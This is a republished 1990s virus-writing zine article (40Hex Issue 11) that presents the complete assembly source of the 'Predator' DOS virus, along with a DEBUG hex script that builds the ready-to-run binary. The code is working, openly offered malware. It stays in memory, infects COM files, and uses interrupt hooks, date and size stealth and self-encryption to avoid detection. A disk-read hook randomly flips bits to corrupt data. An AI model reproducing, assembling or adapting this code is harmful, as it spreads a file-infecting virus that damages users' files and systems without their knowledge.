Copy Link
Add to Bookmark
Report

40Hex Issue 11 File 008

eZine's profile picture
Published in 
40Hex
 · 4 months ago

40Hex Issue 11 Volume 3 Number 2                                      File 008 

Predator

Predator is a virus written by Phalcon/Skism's newest member, Priest. It
incorporates a number of stealth features. It infects only COM files.
Predator uses the "Century" technique of marking a virus infection; file dates
are bumped up 100 years to designate an infection.

--Predator Source Code---------------------------------------------------------
CSEG SEGMENT
ASSUME CS:CSEG, ES:CSEG, SS:CSEG
ORG 0h

; Source code of the Predator

; Priest


Its_Me equ 'IM'

Read_Only equ 1

Mem_Size equ offset Finish-offset Virus_Start ;amount of memory needed

Virus_Size equ offset Virus_End-offset Virus_Start ;size of virus
New_Virus_Size equ offset Finish-offset New_Virus ;size of virus w/
;encryption


Hundred_Years equ 0c8h

Version equ 30h ;Get DOS Version
Open equ 3dh ;Open File
Ext_Open equ 6ch ;Extended Open File
Execute equ 4bh ;Execute
Find_FCB equ 11h ;Find File Control Block
Find_FCB_Next equ 12h ;Find next FCB
Open_FCB equ 0fh ;Open FCB
Get_DTA equ 2fh ;Get DTA address
Find_Dir equ 4eh ;Find file
Find_Dir_Next equ 4fh ;Find next file

Attribute equ 1 ;infection flags
Opened equ 2
Written equ 4

Extended_FCB equ 0ffh ;Extended FCB will have the first
;byte equal to FFh

Virus_Start: mov sp,bp ;restore Stack after decryption
sti ;interrupts on
mov ah,Version
mov bx,Its_Me
int 21h ;Check if already resident
cmp ax,Its_Me
jne Go_Res
Jump_R_F: jmp Return_File
Go_Res: mov ax,cs
dec ax ;get segment of this MCB
MCB_ds: mov ds,ax
cmp byte ptr ds:[0],'Z' ;must be last Memory Control Block
jne Jump_R_F
Found_last_MCB: mov ax,Mem_Size ;Reserve enough for virus + data
mov cl,4h
shr ax,cl ;convert to paragraphs
inc ax
push ax
dec ax
shr ax,cl
shr cl,1
shr ax,cl ;convert to kilobytes
inc ax
push ds
xor bx,bx
mov ds,bx
sub word ptr ds:[413h],ax ;take memory from int 12
pop ds
pop ax
sub word ptr ds:[0003h],ax ;take it from availible memory
mov ax,cs
add ax,ds:[0003h] ;get segment of free memory
mov es,ax
push cs
pop ds
call $+3 ;next 3 instructions find Virus_Start
pop si
sub si,(offset $-1)-offset Virus_Start
xor di,di
mov cx,Mem_Size
cld
rep movsb ;copy us to High Memory
push es
mov ax,offset High_Start
push ax
retf ;jump up there

Virus_Name: db 'Predator virus '
Copyright: db '(c) Mar. 93 '
Me: db 'Priest'

File_Bytes db 0cdh, 20h, 0h ;first 3 bytes of infected .com file

Com_Spec: db '.COM',0h ;only .com files can be infected

High_Start: push cs
pop ds
mov ax,3521h ;get address of Int 21
int 21h
mov word ptr ds:[Int_21],bx ;save it
mov word ptr ds:[Int_21+2h],es
mov al,13h ;get address of Int 13
int 21h
mov word ptr ds:[Int_13],bx ;save it
mov word ptr ds:[Int_13+2h],es
mov ah,25h ;point Int 13 to our handler
mov dx,offset New_13
int 21h
mov al,21h ;21h too
mov dx,offset New_21
int 21h
xor ax,ax
mov ds,ax
mov ax,ds:[46ch] ;get a random number for
push cs ; activation task
pop ds
xchg al,ah
add word ptr ds:[Count_Down],ax ;Save it for count down
Return_File: push ss
pop es
mov di,100h
call $+3 ;get address of first 3 bytes of .com file
pop si
sub si,(offset $-1)-offset File_Bytes
push ss
push di
cld
movsw ;move them
movsb
push ss
pop ds
xor ax,ax
retf ;jump to original program



New_21: cmp ah,Open ;check function
je Infect
cmp ah,Ext_Open
je Ext_File_Open
cmp ah,Execute
je Infect
cmp ah,Find_FCB
je Stealth_FCB
cmp ah,Find_FCB_Next
je Stealth_FCB
cmp ah,Open_FCB
je Stealth_FCB_O
cmp ah,Find_Dir
je Stealth_Dir
cmp ah,Find_Dir_Next
je Stealth_Dir
cmp ah,Version ;other checking for us
jne Jump_21
cmp bx,Its_Me
jne Jump_21
mov ax,bx ;tell other that we're here
Ret_21: retf 0002h
Jump_21: jmp cs:Int_21

Stealth_Dir: jmp Hide_Find
Stealth_FCB: jmp Hide_FCB
Stealth_FCB_O: jmp Hide_FCB_O

Infect_Error_J: jmp Infect_Error
Ext_File_Open: mov word ptr cs:[File_Pnt],si ;Extended open uses DS:SI
jmp short Infect_ds
Infect: mov word ptr cs:[File_Pnt],dx ;Open & Execute use DS:DX
Infect_ds: mov word ptr cs:[File_Pnt+2h],ds
mov byte ptr cs:[Infect_Status],0h ;zero out progress byte
call Push_All ;Push all registers
call Hook_24 ;Hook Int 24 to avoid errors being displayed
call Is_Com ;Is it a .com file?
jb Infect_Error_J ;Carry flag set if it is not
lds dx,cs:[File_Pnt] ;get saved address of file name
mov ax,4300h ;fetch the attribute
push ax
call Old_21
pop ax
jb Infect_Error_J
mov byte ptr cs:[File_Attr],cl ;save attribute
test cl,Read_Only ;no need to change if not read only
je No_Attr_Rem
xor cx,cx
inc al
call Old_21 ;if read only, then zero out
jb Infect_Error_J
or byte ptr cs:[Infect_Status],Attribute ;update progress byte
No_Attr_Rem: mov ax,3dc2h ;open with write/compatibility
call Old_21
jb Infect_Error_J
xchg ax,bx ;handle into bx
push cs
pop ds
or byte ptr ds:[Infect_Status],Opened ;update progress byte
mov ax,5700h ;get date
call Old_21
cmp dh,Hundred_Years ;is it infected?
jnb Infect_Error
add dh,Hundred_Years ;else add 100 years to date
mov word ptr ds:[File_Date],dx ;save modified date
mov word ptr ds:[File_Time],cx
mov ah,3fh ;read first 3 bytes
mov cx,3h
mov dx,offset File_Bytes
call Old_21
cmp ax,cx ;if error, then quit
jne Infect_Error
cmp word ptr ds:[File_Bytes],'MZ' ;no .exe files
je Infect_Error
cmp word ptr ds:[File_Bytes],'ZM'
je Infect_Error
mov al,2 ;set file pointer to end of file
call Set_Pnt
or dx,dx ;too big?
jne Infect_Error
cmp ax,1000 ;too small?
jb Infect_Error
cmp ax,0-2000 ;still too big?
ja Infect_Error
mov di,offset Jump_Bytes ;make a jump to end of file
push ax
add ax,100h ;these two are for the encryption
mov word ptr ds:[Decrypt_Start_Off+1],ax
push cs
pop es
mov al,0e9h ;e9h = JMP xxxx
cld
stosb
pop ax
sub ax,3h ; to end of file
stosw
call Encrypt_Virus ;encrypt the virus
mov ah,40h ;write the encrypted virus and the
;decryption routine to file
mov dx,offset New_Virus
mov cx,New_Virus_Size
call Old_21
jb Infect_Error
or byte ptr ds:[Infect_Status],Written ;update progress byte
xor al,al ;set file pointer to
call Set_Pnt ;beginning of file
mov ah,40h ;write the jump
mov dx,offset Jump_Bytes
mov cx,3h
call Old_21
Infect_Error: test byte ptr cs:[Infect_Status],Opened ;was file opened?
je Set_Attr
test byte ptr cs:[Infect_Status],Written ;was file written to?
je Close
mov ax,5701h ;if infected, restore modified date
mov dx,cs:[File_Date]
mov cx,ds:[File_Time]
call Old_21
Close: mov ah,3eh ;close file
call Old_21
Set_Attr: test byte ptr cs:[Infect_Status],Attribute ;attribute changed?
je Jump_Old_21
mov ax,4301h ;if changed, then restore it
xor cx,cx
mov cl,cs:[File_Attr]
lds dx,cs:[File_Pnt]
call Old_21
Jump_Old_21: call Unhook_24 ;unhook Int 24
call Pop_All ;pop all registers
jmp Jump_21 ;jump to original int 21

Set_Pnt: mov ah,42h ;set file pointer w/ al as parameter
xor cx,cx
cwd ;zero out dx
call Old_21
retn


Pop_All: pop word ptr cs:[Ret_Add] ;save return address
pop es
pop ds
pop si
pop di
pop bp
pop dx
pop cx
pop bx
pop ax
popf
jmp cs:[Ret_Add] ;jump to return address

Push_All: pop word ptr cs:[Ret_Add] ;save return address
pushf
push ax
push bx
push cx
push dx
push bp
push di
push si
push ds
push es
jmp cs:[Ret_Add] ;jump to return address


Hook_24: call Push_All ;push all registers
mov ax,3524h ;get int 24 address
call Old_21
mov word ptr cs:[Int_24],bx ;save address
mov word ptr cs:[Int_24+2h],es
mov ah,25h ;set new address to us
push cs
pop ds
mov dx,offset New_24
call Old_21
call Pop_All ;pop all registers
retn

Unhook_24: call Push_All
mov ax,2524h ;set old address back
lds dx,cs:[Int_24]
Call Old_21
call Pop_All
retn

New_24: mov al,3h ;int 24, fail
iret

Old_21: pushf ;call to original int 21
call cs:Int_21
retn

;Hide_Find hides the file size increase for functions 4eh and 4fh and the
;date change


Hide_Find: call Old_21 ;do the search
call Push_All ;push all registers
jb Hide_File_Error
mov ah,2fh ;get DTA address
call Old_21
cmp byte ptr es:[bx.DTA_File_Date+1h],Hundred_Years ;Is it
jb Hide_File_Error ;infected?
sub byte ptr es:[bx.DTA_File_Date+1h],Hundred_Years ;Take

;away 100 years from date

sub word ptr es:[bx.DTA_File_Size],New_Virus_Size ;take

;away Virus_Size from file size

sbb word ptr es:[bx.DTA_File_Size+2],0 ;subtract remainder

;although there will not be one
; I included it for expandibility
; (i.e. infecting .exe files)
Hide_File_Error:call Pop_All ;pop all registers
jmp Ret_21

;Hide_FCB hides the file size increase for functions 11h and 12h and the
;date change


Hide_FCB: call Old_21 ;find file
call Push_All ;push registers
or al,al ;al=0 if no error
jne Hide_FCB_Error
mov ah,Get_DTA ;get address of DTA
call Old_21
cmp byte ptr ds:[bx],Extended_FCB ;is it an extended FCB?
jne Hide_FCB_Reg
add bx,7h ;yes, add 7 to address to skip garbage

Hide_FCB_Reg: cmp byte ptr es:[bx.DS_Date+1h],Hundred_Years ;Is it infected?
jb Hide_FCB_Error
sub byte ptr es:[bx.DS_Date+1h],Hundred_Years ;yes, restore
;date

sub word ptr es:[bx.DS_File_Size],New_Virus_Size ;fix size
sbb word ptr es:[bx.DS_File_Size+2],0 ;and remainder
Hide_FCB_Error: call Pop_All ;pop all registers
jmp Ret_21

;Hide_FCB_O hides the file size increase for function 0fh and the
;date change

Hide_FCB_O: call Old_21 ;open FCB
call Push_All ;push all registers
cmp al,0h ;al=0 if opened, else error
jne Hide_FCB_O_Error
mov bx,dx ;pointer into bx

cmp byte ptr ds:[bx],Extended_FCB ;is it an extended FCB?
jne Hide_FCB_No_E
add bx,7h ;yes, add 7 to skip garbage

Hide_FCB_No_E: cmp byte ptr ds:[bx.FCB_File_Date+1h],Hundred_Years ;infected?
jb Hide_FCB_O_Error
sub byte ptr ds:[bx.FCB_File_Date+1h],Hundred_Years ;yes,
;fix date

sub word ptr ds:[bx.FCB_File_Size],New_Virus_Size ;fix size
sbb word ptr ds:[bx.FCB_File_Size+2h],0 ;and remainder
Hide_FCB_O_Error:call Pop_All ;pop all registers
jmp Ret_21

Is_Com: push cs
pop ds
les di,ds:[File_Pnt] ;get address of file
xor al,al
mov cx,7fh
cld
repne scasb ;scan for null byte at end of file name
cmp cx,7fh-5h ;must be at least 5 bytes long,
;including ext. (.COM)
jnb Is_Not_Com
mov cx,5h ;compare last five bytes to ".COM",0
sub di,cx
mov si,offset Com_Spec ;offset of ".COM",0
cld
rep cmpsb ;compare them
jne Is_Not_Com
clc ;if .com file, then clear carry flag
retn
Is_Not_Com: stc ;else set it
retn

;This is the interrupt 13 handle, it's sole purpose is to complement a
;random bit after a random number of sectors (1-65535) have been read.


New_13: cmp ah,2h ;Is a sector going to be read
je Read_Sector
Jump_13: jmp cs:Int_13 ;no, continue on
Ret_13: call Pop_All ;pop all registers
retf 0002h
Read_Sector: mov byte ptr cs:[Sub_Value],al ;save number of sectors read
pushf
call cs:Int_13 ;read the sectors
call Push_All ;push flags
jb Ret_13 ;jump if error to return
mov al,cs:[Sub_Value] ;get number of sectors read
cbw
sub word ptr cs:[Count_Down],ax ;subtract it from our count
ja Ret_13 ;down
mov bx,200h ;200h bytes per sector
cwd ;zero dx
mul bx ;mul # of sectors by 200
dec ax ;minus one
xor cx,cx
mov ds,cx
mov cx,ds:[46ch] ;get random value
mov word ptr cs:[Count_Down],cx ;move it into count down
push cx
and cx,ax ;cx must be < ax
add bx,cx ;add it to the address of
pop cx ;where the sectors were read
add cl,ch ;randomize cl
rcr word ptr es:[bx],cl ;get a random bit
cmc ;reverse it
rcl word ptr es:[bx],cl ;put it back
jmp short Ret_13 ;jump to return

;The Encrypt_Virus module copies the decryption routine and an encrypted
;copy of the virus to a buffer

Encrypt_Virus: xor ax,ax
mov ds,ax
mov ax,ds:[46ch] ;get random value
push cs
pop ds
add byte ptr ds:[Decrypt_Value],al ;use as encryption key
mov al,ds:[Decrypt_Value] ;get encryption key
add ah,al ;randomize ah
add byte ptr ds:[Decrypt_Random],ah ;put random garbage
mov si,offset Decrypt_Code ;copy decryption routine
mov di,offset New_Virus
mov cx,offset Decrypt_End-offset Decrypt_Code
cld
rep movsb ;to buffer
mov si,offset Virus_Start ;copy virus
mov cx,((Virus_Size)/2)+1
Encrypt_Loop: xchg ax,cx
push ax
lodsw
rol ax,cl ;and encrypt
not ax
stosw ;to buffer
pop ax
xchg ax,cx
loop Encrypt_Loop
dec di ;fix pointer for
dec di ;decryption routine
sub di,offset New_Virus ;point decryption's SP to end of
;encrypted code for proper
;decryption

add word ptr ds:[New_Virus+(Decrypt_Start_Off+1-Decrypt_Code)],di
retn

;Decryption routine

Decrypt_Code: mov dx,((Virus_Size)/2)+1
db 0b1h ;mov cl,
Decrypt_Value db ?
cli
mov bp,sp
Decrypt_Start_Off:mov sp,1234h
Decrypt_Loop: pop ax
not ax
ror ax,cl
push ax
jmp short $+3
Decrypt_Random: db 12h
dec sp
dec sp
dec dx
jne Decrypt_Loop
Decrypt_End:

db ?
Virus_End:

Jump_Bytes db 3 dup(0)

Int_13 dd ?
Int_21 dd ?
Int_24 dd ?

Ret_Add dw ?

File_Pnt dd ?

Infect_Status db ?

File_Time dw ?
File_Date dw ?
File_Attr db ?

Count_Down dw ?
Sub_Value db ?

New_Virus db Virus_Size+(offset Decrypt_End-offset Decrypt_Code)+1 dup(0)

Finish:

;various structures

Directory STRUC
DS_Drive db ?
DS_File_Name db 8 dup(0)
DS_File_Ext db 3 dup(0)
DS_File_Attr db ?
DS_Reserved db 10 dup(0)
DS_Time dw ?
DS_Date dw ?
DS_Start_Clust dw ?
DS_File_Size dd ?
Directory ENDS

FCB STRUC
FCB_Drive db ?
FCB_File_Name db 8 dup(0)
FCB_File_Ext db 3 dup(0)
FCB_Block dw ?
FCB_Rec_Size dw ?
FCB_File_Size dd ?
FCB_File_Date dw ?
FCB_File_Time dw ?
FCB_Reserved db 8 dup(0)
FCB_Record db ?
FCB_Random dd ?
FCB ENDS

DTA STRUC
DTA_Reserved db 21 dup(0)
DTA_File_Attr db ?
DTA_File_Time dw ?
DTA_File_Date dw ?
DTA_File_Size dd ?
DTA_File_Name db 13 dup(0)
DTA ENDS





CSEG ENDS
END Virus_Start
--Predator Debug Script--------------------------------------------------------
n predator.com
e 0100 8B E5 FB B4 30 BB 4D 49 CD 21 3D 4D 49 75 03 E9
e 0110 AF 00 8C C8 48 8E D8 80 3E 00 00 5A 75 F1 B8 64
e 0120 08 B1 04 D3 E8 40 50 48 D3 E8 D0 E9 D3 E8 40 1E
e 0130 33 DB 8E DB 29 06 13 04 1F 58 29 06 03 00 8C C8
e 0140 03 06 03 00 8E C0 0E 1F E8 00 00 5E 81 EE 4B 00
e 0150 33 FF B9 64 08 FC F3 A4 06 B8 89 00 50 CB 50 72
e 0160 65 64 61 74 6F 72 20 76 69 72 75 73 20 20 28 63
e 0170 29 20 4D 61 72 2E 20 39 33 20 20 50 72 69 65 73
e 0180 74 CD 20 00 2E 43 4F 4D 00 0E 1F B8 21 35 CD 21
e 0190 89 1E 1D 04 8C 06 1F 04 B0 13 CD 21 89 1E 19 04
e 01A0 8C 06 1B 04 B4 25 BA 6D 03 CD 21 B0 21 BA D8 00
e 01B0 CD 21 33 C0 8E D8 A1 6C 04 0E 1F 86 C4 01 06 31
e 01C0 04 16 07 BF 00 01 E8 00 00 5E 81 EE 48 00 16 57
e 01D0 FC A5 A4 16 1F 33 C0 CB 80 FC 3D 74 4B 80 FC 6C
e 01E0 74 3F 80 FC 4B 74 41 80 FC 11 74 2C 80 FC 12 74
e 01F0 27 80 FC 0F 74 25 80 FC 4E 74 1A 80 FC 4F 74 15
e 0200 80 FC 30 75 0B 81 FB 4D 49 75 05 8B C3 CA 02 00
e 0210 2E FF 2E 1D 04 E9 9A 01 E9 C5 01 E9 FA 01 E9 DC
e 0220 00 2E 89 36 27 04 EB 05 2E 89 16 27 04 2E 8C 1E
e 0230 29 04 2E C6 06 2B 04 00 E8 26 01 E8 37 01 E8 08
e 0240 02 72 DB 2E C5 16 27 04 B8 00 43 50 E8 5C 01 58
e 0250 72 CC 2E 88 0E 30 04 F6 C1 01 74 0F 33 C9 FE C0
e 0260 E8 48 01 72 B9 2E 80 0E 2B 04 01 B8 C2 3D E8 3A
e 0270 01 72 AB 93 0E 1F 80 0E 2B 04 02 B8 00 57 E8 2A
e 0280 01 80 FE C8 73 77 80 C6 C8 89 16 2E 04 89 0E 2C
e 0290 04 B4 3F B9 03 00 BA 81 00 E8 0F 01 3B C1 75 5D
e 02A0 81 3E 81 00 5A 4D 74 55 81 3E 81 00 4D 5A 74 4D
e 02B0 B0 02 E8 8F 00 0B D2 75 44 3D E8 03 72 3F 3D 30
e 02C0 F8 77 3A BF 16 04 50 05 00 01 A3 05 04 0E 07 B0
e 02D0 E9 FC AA 58 2D 03 00 AB E8 E2 01 B4 40 BA 34 04
e 02E0 B9 30 04 E8 C5 00 72 15 80 0E 2B 04 04 32 C0 E8
e 02F0 52 00 B4 40 BA 16 04 B9 03 00 E8 AE 00 2E F6 06
e 0300 2B 04 02 74 1C 2E F6 06 2B 04 04 74 0F B8 01 57
e 0310 2E 8B 16 2E 04 8B 0E 2C 04 E8 8F 00 B4 3E E8 8A
e 0320 00 2E F6 06 2B 04 01 74 12 B8 01 43 33 C9 2E 8A
e 0330 0E 30 04 2E C5 16 27 04 E8 70 00 E8 58 00 E8 0C
e 0340 00 E9 CC FE B4 42 33 C9 99 E8 5F 00 C3 2E 8F 06
e 0350 25 04 07 1F 5E 5F 5D 5A 59 5B 58 9D 2E FF 26 25
e 0360 04 2E 8F 06 25 04 9C 50 53 51 52 55 57 56 1E 06
e 0370 2E FF 26 25 04 E8 E9 FF B8 24 35 E8 2D 00 2E 89
e 0380 1E 21 04 2E 8C 06 23 04 B4 25 0E 1F BA A8 02 E8
e 0390 19 00 E8 B8 FF C3 E8 C8 FF B8 24 25 2E C5 16 21
e 03A0 04 E8 07 00 E8 A6 FF C3 B0 03 CF 9C 2E FF 1E 1D
e 03B0 04 C3 E8 F6 FF E8 A9 FF 72 20 B4 2F E8 EC FF 26
e 03C0 80 BF 19 00 C8 72 13 26 80 AF 19 00 C8 26 81 AF
e 03D0 1A 00 30 04 26 83 9F 1C 00 00 E8 70 FF E9 2D FE
e 03E0 E8 C8 FF E8 7B FF 0A C0 75 28 B4 2F E8 BC FF 80
e 03F0 3F FF 75 03 83 C3 07 26 80 BF 1A 00 C8 72 13 26
e 0400 80 AF 1A 00 C8 26 81 AF 1D 00 30 04 26 83 9F 1F
e 0410 00 00 E8 38 FF E9 F5 FD E8 90 FF E8 43 FF 3C 00
e 0420 75 21 8B DA 80 3F FF 75 03 83 C3 07 80 BF 15 00
e 0430 C8 72 10 80 AF 15 00 C8 81 AF 10 00 30 04 83 9F
e 0440 12 00 00 E8 07 FF E9 C4 FD 0E 1F C4 3E 27 04 32
e 0450 C0 B9 7F 00 FC F2 AE 83 F9 7A 73 0F B9 05 00 2B
e 0460 F9 BE 84 00 FC F3 A6 75 02 F8 C3 F9 C3 80 FC 02
e 0470 74 0B 2E FF 2E 19 04 E8 D3 FE CA 02 00 2E A2 33
e 0480 04 9C 2E FF 1E 19 04 E8 D7 FE 72 EB 2E A0 33 04
e 0490 98 2E 29 06 31 04 77 DF BB 00 02 99 F7 E3 48 33
e 04A0 C9 8E D9 8B 0E 6C 04 2E 89 0E 31 04 51 23 C8 03
e 04B0 D9 59 02 CD 26 D3 1F F5 26 D3 17 EB BA 33 C0 8E
e 04C0 D8 A1 6C 04 0E 1F 00 06 00 04 A0 00 04 02 E0 00
e 04D0 26 0F 04 BE FC 03 BF 34 04 B9 19 00 FC F3 A4 BE
e 04E0 00 00 B9 0C 02 91 50 AD D3 C0 F7 D0 AB 58 91 E2
e 04F0 F4 4F 4F 81 EF 34 04 01 3E 3D 04 C3 BA 0C 02 B1
e 0500 00 FA 8B EC BC 34 12 58 F7 D0 D3 C8 50 EB 01 12
e 0510 4C 4C 4A 75 F2 00 00 00 00 00 00 00 00 00 00 00
e 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0810 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0830 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0840 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0850 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0860 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0870 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0880 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0890 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 08A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 08B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 08C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 08D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 08E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 08F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0900 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0910 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0920 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0930 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0940 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0950 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0960 00 00 00 00

rcx
0864
w
q
-------------------------------------------------------------------------------

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT